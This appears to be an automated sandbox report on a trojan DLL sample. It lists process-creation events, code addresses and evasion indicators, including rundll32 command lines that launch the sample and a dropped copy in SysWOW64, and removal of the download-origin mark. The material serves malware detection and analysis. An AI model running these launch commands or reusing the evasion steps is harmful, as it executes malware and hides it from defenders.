                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ABD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ECD1DE0 appears 97 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ECEAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ECD1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ECEAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: efELSMI5R4.dllVirustotal: Detection: 19%
                      Source: efELSMI5R4.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2267.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@41/21@0/1
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1B99 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:204:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6736:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5604:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6404
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: efELSMI5R4.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: efELSMI5R4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.582794929.000000000058C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.597098712.0000000000432000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011013E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008613E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007713E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A13E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.peeJump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\svchost.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 4736Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE2C8 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.22.drBinary or memory string: VMware
                      Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
